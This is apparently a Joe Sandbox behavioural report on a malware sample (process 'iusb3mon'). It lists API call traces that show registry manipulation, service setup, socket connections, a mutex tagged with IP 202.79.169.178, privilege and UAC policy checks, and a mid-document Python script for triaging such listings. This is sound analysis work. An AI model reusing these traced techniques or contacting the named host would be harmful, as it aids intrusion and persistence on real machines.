                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0624909A
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 062490A9
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 062490BA
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 062490C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                                                                                                    • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
                                                                                                                    • API String ID: 2887716753-2040270271
                                                                                                                    • Opcode ID: 25fe54aa7b96dd41c72f13be22feedae0cab5cf90153d532a85ef5e6d246020b
                                                                                                                    • Instruction ID: 93e97b02733983823f6db6e923ac1435ae38385956af64fe74b8e4202dcad843
                                                                                                                    • Opcode Fuzzy Hash: 25fe54aa7b96dd41c72f13be22feedae0cab5cf90153d532a85ef5e6d246020b
                                                                                                                    • Instruction Fuzzy Hash: 11217C71D5431ABADB10ABF69C89EEFBFB8EF08600F014455F940E2140DAB49A85CFA1
                                                                                                                    APIs
                                                                                                                    • RegisterServiceCtrlHandlerA.ADVAPI32(0626CA80,062459C2), ref: 062458C3
                                                                                                                    • SetServiceStatus.ADVAPI32(00000000,06273118), ref: 06245913
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 06245921
                                                                                                                    • GetVersionExA.KERNEL32(?), ref: 06245938
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118), ref: 06245958
                                                                                                                      • Part of subcall function 0624571E: CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,202.79.169.178,0626CC34,06246CAB), ref: 06245729
                                                                                                                      • Part of subcall function 0624571E: GetLastError.KERNEL32 ref: 06245731
                                                                                                                      • Part of subcall function 0624571E: CloseHandle.KERNEL32(00000000), ref: 0624573F
                                                                                                                    • Sleep.KERNEL32(0000003C), ref: 06245961
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06245977
                                                                                                                    • wsprintfA.USER32 ref: 06245990
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 062459A6
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118), ref: 062459B9
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118,06273118,750904E0,00000001,00000000), ref: 062459FF
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 06245A06
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118), ref: 06245A20
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118,06273118,750904E0,00000001,00000000), ref: 06245A43
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 06245A4A
                                                                                                                    • SetServiceStatus.ADVAPI32(06273118,06273118,750904E0,00000001,00000000), ref: 06245A7E
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 06245A85
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Service$Status$Sleep$CloseHandle$CreateCtrlErrorFileHandlerLastModuleMutexNameRegisterVersionwsprintf
                                                                                                                    • String ID: %s Win7
                                                                                                                    • API String ID: 2853745164-511819196
                                                                                                                    • Opcode ID: 20bce57d8ae736802878b97240a3f7722d398e9b964ccac37134f5fd49ac3875
                                                                                                                    • Instruction ID: dde0d44babbb3b4651b742ab2bceb0641add3a32ba76bce522d2f95e97ec7bdd
                                                                                                                    • Opcode Fuzzy Hash: 20bce57d8ae736802878b97240a3f7722d398e9b964ccac37134f5fd49ac3875
                                                                                                                    • Instruction Fuzzy Hash: D441A370510315AFE750EF61FC4EF967BBAFB05719F004059E788A6188CBB54644DFA2
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0625C82F: TlsGetValue.KERNEL32(00000000,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?,?,00000100), ref: 0625C86E
                                                                                                                    • CallNextHookEx.USER32(?,00000003,?,?), ref: 06259595
                                                                                                                    • GetClassLongA.USER32(?,000000E6), ref: 062595DC
                                                                                                                    • GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,?,0625C4D2), ref: 06259608
                                                                                                                    • lstrcmpiA.KERNEL32(?,ime), ref: 06259617
                                                                                                                    • GetWindowLongA.USER32(?,000000FC), ref: 0625968A
                                                                                                                    • SetWindowLongA.USER32(?,000000FC,00000000), ref: 062596AB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
                                                                                                                    • String ID: AfxOldWndProc423$ime
                                                                                                                    • API String ID: 3731301195-104836986
                                                                                                                    • Opcode ID: 042531add3ca4f754ee3028d51b395ad4eca7072d3a897ab306a97d17b7ac4de
                                                                                                                    • Instruction ID: 62c913622c1d59d012bf96e88a19297337c926b9ad58a26bc8c06f1ab7b79f80
                                                                                                                    • Opcode Fuzzy Hash: 042531add3ca4f754ee3028d51b395ad4eca7072d3a897ab306a97d17b7ac4de
                                                                                                                    • Instruction Fuzzy Hash: BC518B71D20356EBCB719F64DC48BAE3BA9BF04261F124654FD55AA190DB30DA84CF90
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,0626CB7A,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001,0626CB7A), ref: 06249450
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06249467
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06249472
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 0624947D
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06249488
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06249493
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0624949E
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001), ref: 06249592
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                    • String ID: ADVAPI32.dll$Console$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
                                                                                                                    • API String ID: 2449869053-4282833508
                                                                                                                    • Opcode ID: c1d09b02beb8542c05399b031902a655f6450bb50abd8ccf516b5f21368507f9
                                                                                                                    • Instruction ID: e57ec10c011f3e8e9b8fdf08d9c826e12b351ecd93c63d767b36e76c0c623c76
                                                                                                                    • Opcode Fuzzy Hash: c1d09b02beb8542c05399b031902a655f6450bb50abd8ccf516b5f21368507f9
                                                                                                                    • Instruction Fuzzy Hash: C7416871D2021EBFEF55AF94DC84EBFBB79EB08651F104025FE24A2060D7708990DBA0
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                    • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                    • GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                    • GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                    • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                    • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493CF
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoadlstrcpy
                                                                                                                    • String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
                                                                                                                    • API String ID: 2888591476-2913591164
                                                                                                                    • Opcode ID: d501b422fc5f82e0deaf15fbc164e6c0d5deddfb42ff19197d891f732317061d
                                                                                                                    • Instruction ID: e3a8604e0104de495a6896cd5d9c64b1f102540af01f348d79f96799b6aa1772
                                                                                                                    • Opcode Fuzzy Hash: d501b422fc5f82e0deaf15fbc164e6c0d5deddfb42ff19197d891f732317061d
                                                                                                                    • Instruction Fuzzy Hash: 9561EB71D2021EAFDF65AF95DC84AEF7BB9FB09700F0001A6F919A2150D7719A94CF60
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06248B17
                                                                                                                    • GetProcAddress.KERNEL32(00000000,socket), ref: 06248B2C
                                                                                                                    • GetProcAddress.KERNEL32(?,recv), ref: 06248B39
                                                                                                                    • GetProcAddress.KERNEL32(?,connect), ref: 06248B46
                                                                                                                    • GetProcAddress.KERNEL32(?,getsockname), ref: 06248B53
                                                                                                                    • GetProcAddress.KERNEL32(?,select), ref: 06248B60
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 06248B9D
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,?,?,00000010), ref: 06248C38
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000010), ref: 06248CA2
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 06248CD3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ErrorLastLibrary$FreeLoadObjectSingleWait
                                                                                                                    • String ID: connect$getsockname$recv$select$socket$ws2_32.dll
                                                                                                                    • API String ID: 1315272698-1466708075
                                                                                                                    • Opcode ID: e835b7c7d5dd4efa87afd3c417e52786b0b82b669fc205b7ee56661bdd86361b
                                                                                                                    • Instruction ID: 79c7a344de4bda5aea60e9823d78256b2adfa45fa4483f45971cc2d059dbb3d4
                                                                                                                    • Opcode Fuzzy Hash: e835b7c7d5dd4efa87afd3c417e52786b0b82b669fc205b7ee56661bdd86361b
                                                                                                                    • Instruction Fuzzy Hash: 54617972D20218EFDF64AFA0DC88ADEBBB9EF04310F104156FA15E6290D7759A85CF91
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0625B4CB: GetWindowLongA.USER32(?,000000F0), ref: 0625B4D7
                                                                                                                    • GetParent.USER32(?), ref: 0625ADF8
                                                                                                                    • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0625AE1B
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0625AE34
                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0625AE47
                                                                                                                    • CopyRect.USER32(?,?), ref: 0625AE94
                                                                                                                    • CopyRect.USER32(?,?), ref: 0625AE9E
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0625AEA7
                                                                                                                    • CopyRect.USER32(?,?), ref: 0625AEC3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                    • String ID: ($@
                                                                                                                    • API String ID: 808654186-1311469180
                                                                                                                    • Opcode ID: 547f7bf64e158cc0705ed84a649ecfd35cb358c01820df9adaceea097697c4b1
                                                                                                                    • Instruction ID: 948817914eb2c165e9c9a33a3e0e7dbbdc5c9ce2028aac8fe5b880d340e47c33
                                                                                                                    • Opcode Fuzzy Hash: 547f7bf64e158cc0705ed84a649ecfd35cb358c01820df9adaceea097697c4b1
                                                                                                                    • Instruction Fuzzy Hash: 5A516472D10319AFDB60DBA8DC89EEEBBB9AF48710F164265ED11F3180D670E945CB60
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 06245AEA
                                                                                                                    • RegQueryValueA.ADVAPI32(00000000,00000000,?,06245CD7), ref: 06245B09
                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 06245B14
                                                                                                                    • wsprintfA.USER32 ref: 06245B3C
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 06245B5C
                                                                                                                    • RegQueryValueA.ADVAPI32(00000000,00000000,?,06245CD7), ref: 06245B93
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 06245B98
                                                                                                                    • lstrcatA.KERNEL32(?,Function_00027D6C), ref: 06245BDA
                                                                                                                    • lstrcatA.KERNEL32(?,06245CD7), ref: 06245BE6
                                                                                                                    • lstrcpyA.KERNEL32(00000000,06245CD7), ref: 06245BEE
                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06245C27
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValuelstrcat$CreateProcesslstrcpywsprintf
                                                                                                                    • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                                    • API String ID: 1351118359-33419044
                                                                                                                    • Opcode ID: 48d26875d3a990628e623c6c4d4f75cd7a0a0cc54d522a214b453c5803f6286c
                                                                                                                    • Instruction ID: b53b504df655d7f8227a15df3e06113e813254beb13fb16aebcd23892a77dd34
                                                                                                                    • Opcode Fuzzy Hash: 48d26875d3a990628e623c6c4d4f75cd7a0a0cc54d522a214b453c5803f6286c
                                                                                                                    • Instruction Fuzzy Hash: 6641307291021DBBDB65ABA1DC49EEF7B7DEB44704F1404A6FA05E2040E7719B84CF60
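To triage a listing of this length an analyst wants a per-function capability summary rather than the raw call list. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses the "• Api.Module(args), ref: addr" lines exactly as printed in the function blocks above (including the "Part of subcall function" prefix and calls such as wsprintfA that carry no argument list), groups them by the "APIs" heading, separates libraries passed to LoadLibraryA and names resolved through GetProcAddress from direct calls, and tags each function with coarse capabilities. The sample input is a constructed excerpt of lines copied from the functions above; the capability table and all function names are my own choices.

```python
import re
from typing import Dict, List, Optional, Set

# Constructed sample input: lines copied from the function blocks of this report.
# Joe Sandbox prints "APIs" at the start of each function's call list, so that
# heading is used as the function boundary.
SAMPLE_LISTING = """\
APIs
• LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,0626CB7A,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001,0626CB7A), ref: 06249450
• GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06249467
• GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06249472
• FreeLibrary.KERNEL32(00000000,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001), ref: 06249592
APIs
• LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06248B17
• GetProcAddress.KERNEL32(00000000,socket), ref: 06248B2C
• GetProcAddress.KERNEL32(?,connect), ref: 06248B46
• WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,?,?,00000010), ref: 06248C38
APIs
• RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 06245AEA
• wsprintfA.USER32 ref: 06245B3C
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06245C27
APIs
  • Part of subcall function 0625B4CB: GetWindowLongA.USER32(?,000000F0), ref: 0625B4D7
• GetParent.USER32(?), ref: 0625ADF8
• SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0625AE1B
"""

# One call line: optional subcall prefix, Api.Module, optional "(args)", "ref: addr".
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Coarse capability tags (my own grouping), matched against both direct calls
# and names handed to GetProcAddress.
CAPABILITY_TAGS: Dict[str, Set[str]] = {
    "registry_write": {"RegCreateKeyExA", "RegSetValueExA", "RegDeleteKeyA", "RegDeleteValueA"},
    "registry_read": {"RegOpenKeyExA", "RegQueryValueA", "RegQueryValueExA",
                      "RegEnumValueA", "RegEnumKeyExA"},
    "network": {"socket", "connect", "recv", "send", "select", "getsockname"},
    "process_create": {"CreateProcessA", "CreateProcessW"},
    "token_inspect": {"OpenProcessToken", "GetTokenInformation", "GetSidSubAuthority"},
}


def parse_call(line: str) -> Optional[dict]:
    """Parse one call line; return None for headings and any other text."""
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    raw_args = m.group("args")
    args = [a.strip() for a in raw_args.split(",")] if raw_args else []
    return {"api": m.group("api"), "module": m.group("module"), "args": args,
            "ref": int(m.group("ref"), 16), "subcall": m.group("sub")}


def split_functions(listing: str) -> List[List[dict]]:
    """Group parsed calls into functions, using the 'APIs' heading as the boundary."""
    functions: List[List[dict]] = []
    current: List[dict] = []
    for line in listing.splitlines():
        if line.strip() == "APIs":
            if current:
                functions.append(current)
            current = []
            continue
        call = parse_call(line)
        if call:
            current.append(call)
    if current:
        functions.append(current)
    return functions


def summarize_function(calls: List[dict]) -> dict:
    """Collect loaded libraries, runtime-resolved imports and capability tags."""
    libraries: Set[str] = set()
    resolved: Set[str] = set()
    direct: Set[str] = set()
    for call in calls:
        api, args = call["api"], call["args"]
        if api.startswith("LoadLibrary") and args:
            libraries.add(args[0])
        elif api == "GetProcAddress" and len(args) >= 2:
            resolved.add(args[1])  # name looked up at runtime, invisible to static imports
        else:
            direct.add(api)
    seen = resolved | direct
    tags = {tag for tag, names in CAPABILITY_TAGS.items() if seen & names}
    if resolved:
        tags.add("dynamic_import_resolution")
    return {"libraries": libraries, "resolved_imports": resolved,
            "capabilities": tags, "first_ref": min(c["ref"] for c in calls)}


def summarize_listing(listing: str) -> List[dict]:
    """Summarize every function in a Joe Sandbox call listing."""
    return [summarize_function(f) for f in split_functions(listing)]


if __name__ == "__main__":
    for s in summarize_listing(SAMPLE_LISTING):
        print(f"{s['first_ref']:08X} {sorted(s['libraries'])} {sorted(s['capabilities'])}")
```

Feed it the whole function section of a report and sort on the capability tags: functions that load ADVAPI32.dll and resolve the Reg* write family, or load ws2_32.dll and resolve socket/connect, surface immediately, while the MFC window-geometry helpers fall to the bottom with no tags.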
                                                                                                                    APIs
                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,?,00000000), ref: 06247748
                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?), ref: 06247779
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 06247780
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 062477A2
                                                                                                                    • GetLastError.KERNEL32 ref: 062477A8
                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 062477B8
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 062477D1
                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 062477D9
                                                                                                                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 062477E6
                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 062477EF
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 062477FA
                                                                                                                    • lstrcpyA.KERNEL32(?,0626E16C), ref: 06247848
                                                                                                                    • lstrcatA.KERNEL32(?,0626E154), ref: 06247892
                                                                                                                    Strings
                                                                                                                    • PromptOnSecureDesktop, xrefs: 06247859
                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0624785E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Token$AuthorityInformationLocalProcess$AllocCloseCountCurrentErrorFreeHandleLastOpenVersionlstrcatlstrcpy
                                                                                                                    • String ID: PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                    • API String ID: 209792486-2497808001
                                                                                                                    • Opcode ID: 044ffddb50fb89a6b7400c4f396e75d08bde3ed436101c5d7173010004c0a53a
                                                                                                                    • Instruction ID: 9398629999788ec843b2cd8c56c81768d477d51156a8d342f2323fb54a8c4dcb
                                                                                                                    • Opcode Fuzzy Hash: 044ffddb50fb89a6b7400c4f396e75d08bde3ed436101c5d7173010004c0a53a
                                                                                                                    • Instruction Fuzzy Hash: 1B418274D2030AFFEBA46B61DC89EAE7B79EB45740F1100A2FD51A1141E7B18A80EF61
APIs
• LoadLibraryA.KERNEL32(Ole32.dll,00000000,?,00000000), ref: 062471E4
• GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 062471F4
• GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 062471FF
• GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 0624720A
• LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,06247A46), ref: 06247214
• GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 0624721F
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,06247A46), ref: 062472E1
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,06247A46), ref: 062472EB
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
